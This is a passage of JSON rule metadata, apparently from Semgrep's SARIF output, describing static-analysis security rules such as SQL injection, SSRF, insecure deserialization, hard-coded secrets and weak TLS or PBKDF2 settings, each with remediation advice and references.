Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"help":{"markdown":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0)\n - [https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html](https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html)\n","text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","id":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","name":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"help":{"markdown":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n","text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"helpUri":"https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","id":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","name":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","properties":{"precision":"very-high","tags":["CWE-35: Path Traversal","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url","id":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","name":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-url.pg-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"help":{"markdown":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version)\n - [https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version](https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version)\n","text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","id":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","name":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","id":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","name":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Function sweepToken is allowed to be called by anyone"},"help":{"markdown":"Function sweepToken is allowed to be called by anyone\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted)\n - [https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2](https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2)\n - [https://chainsecurity.com/security-audit/compound-ctoken/](https://chainsecurity.com/security-audit/compound-ctoken/)\n - [https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/](https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/)\n - [https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f](https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f)\n","text":"Function sweepToken is allowed to be called by anyone"},"helpUri":"https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","id":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","name":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath","id":"java.spring.xpath.tainted-xpath.tainted-xpath","name":"java.spring.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","id":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","name":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","id":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","name":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","id":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","name":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"You should probably use Filename.get_temp_dirname()."},"help":{"markdown":"You should probably use Filename.get_temp_dirname().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string)\n","text":"You should probably use Filename.get_temp_dirname()."},"helpUri":"https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string","id":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","name":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: ocaml.lang.portability.slash-tmp.not-portable-tmp-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"help":{"markdown":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation)\n - [https://www.oracle.com/java/technologies/javase/tlsreadme.html](https://www.oracle.com/java/technologies/javase/tlsreadme.html)\n","text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","id":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","name":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"help":{"markdown":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection)\n - [https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security](https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security)\n","text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"helpUri":"https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","id":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","name":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"help":{"markdown":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n - [https://nginx.org/en/docs/http/ngx_http_core_module.html#internal](https://nginx.org/en/docs/http/ngx_http_core_module.html#internal)\n","text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal","id":"generic.nginx.security.missing-internal.missing-internal","name":"generic.nginx.security.missing-internal.missing-internal","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.missing-internal.missing-internal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","id":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","name":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"help":{"markdown":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length)\n - [https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/](https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options](https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures/](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n","text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","id":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","name":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","properties":{"precision":"very-high","tags":["CWE-310: CWE CATEGORY: Cryptographic Issues","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint","id":"rust.actix.sql.postgres-taint.postgres-taint","name":"rust.actix.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - 